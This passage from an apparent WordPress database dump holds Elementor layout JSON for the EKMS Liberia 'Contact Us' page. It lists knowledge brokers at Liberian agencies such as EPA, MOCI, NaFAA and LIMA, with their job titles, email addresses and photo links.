href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24433,3604,'_elementor_edit_mode','builder'),(24434,3604,'_elementor_template_type','wp-page'),(24435,3604,'_elementor_version','3.0.16'),(24436,3604,'_wp_page_template','default'),(24437,3604,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\